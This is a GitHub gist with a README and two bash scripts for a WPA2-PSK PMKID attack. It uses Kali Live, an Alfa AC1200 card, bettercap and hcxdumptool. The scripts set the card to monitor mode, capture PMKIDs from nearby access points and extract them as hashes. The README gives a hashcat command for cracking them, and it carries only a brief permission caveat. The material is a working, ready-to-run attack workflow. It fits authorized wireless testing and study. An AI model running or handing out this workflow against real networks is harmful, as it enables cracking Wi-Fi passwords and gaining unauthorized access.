Skip to content

Instantly share code, notes, and snippets.

@jthuraisamy jthuraisamy/0.README.md Secret
Last active Sep 10, 2019

Embed
What would you like to do?
WPA2-PSK PMKID Attack with Kali Live + Alfa AC1200

WPA2-PSK PMKID Attack with Kali Live + Alfa AC1200

About

This short post goes over the workflow I use for the PMKID attack using an Alfa AC1200 (AWUS036ACH) card with a bootable Kali USB and bettercap + hcxdumptool. I have noticed more results using hcxdumptool compared to wifi.assoc all in bettercap, but I still prefer to view and log the output in bettercap, so this workflow helps make the most of both tools.

There's plenty out there about this attack (see resources at bottom), so nothing particularly novel here. As always, you must only execute this workflow on networks where you have permission.

Setup

  1. Laptop
  2. Kali Live USB
  3. Alfa AC1200 (AWUS036ACH)

Installation

  1. Boot into Kali.
  2. Connect to a network with Internet access to download packages.
  3. Execute install.sh script.
  4. Ensure that the card is connected when prompted.
  5. Confirm that card is running in monitor mode with iwconfig.

Capturing Hashes

  1. Execute capture.sh script.
  2. When complete, enter wifi.show; wifi.recon off; q in bettercap.
  3. When script is finished, it will list all APs where PMKIDs were captured.
  4. Hashes will be found in the *.pmkid.txt files.
  5. Session logs will be found in the *-session_{TOOL}.log files.

Cracking Hashes

  1. Use hashcat with mode 16800, e.g. hashcat -m16800 hashes.txt wordlist.txt --show --force.

Resources

#!/bin/bash
# Install AWUS036ACH drivers.
apt --yes install realtek-rtl88xxau-dkms
# Install Bettercap.
apt --yes install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
mkdir -p /opt/bettercap
cd /opt/bettercap
wget https://github.com/bettercap/bettercap/releases/download/v2.22/bettercap_linux_amd64_2.22.zip
unzip bettercap_linux_amd64_2.22.zip
# Install hcxtools.
apt update
kill `lsof /var/lib/dpkg/lock-frontend | tail -1 | awk '{print $2}'`
apt --yes install git libcurl4-openssl-dev libssl-dev zlib1g-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
git clone https://github.com/ZerBea/hcxtools.git
cd /opt/hcxdumptool
make
make install
cd /opt/hcxtools
make
make install
# Plugin AWUS036ACH.
read -p "Connect the AWUS036ACH, then press [ENTER]..."
service network-manager stop
killall wpa_supplicant
sleep 2
ip link set wlan1 down
sleep 2
iwconfig wlan1 mode monitor
sleep 2
ip link set wlan1 up
#!/bin/bash
mkdir -p ~/captures/
cd ~/captures/
hcxdumptool -i wlan1 -o "$(date +%Y%m%d_%H%M%S)-handshakes_hcxdumptool.pcapng" --enable_status=1 | tee "$(date +%Y%m%d_%H%M%S)-session_hcxdumptool.log" &
sleep 1
/opt/bettercap/bettercap -eval "events.ignore wifi.ap.lost; events.ignore wifi.client.probe; events.ignore wifi.client.new; set wifi.handshakes.file $(date +%Y%m%d_%H%M%S)-handshakes_bettercap.pcap; wifi.recon on" | tee "$(date +%Y%m%d_%H%M%S)-session_bettercap.log"
sleep 1
killall hcxdumptool
sleep 2
echo "Extracting PMKID hashes from PCAP files..."
for pcap_file in $(ls -1 *.pcap*); do
hcxpcaptool -z "$pcap_file.pmkid.txt" "$pcap_file"
done
echo "PMKIDs captured for the following APs:"
python -c "import glob, binascii, pprint; pprint.pprint(set([binascii.unhexlify(line.split('*')[-1]) for line in sum([open(hcf).read().splitlines() for hcf in glob.glob('*.pmkid.txt')], [])]))"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.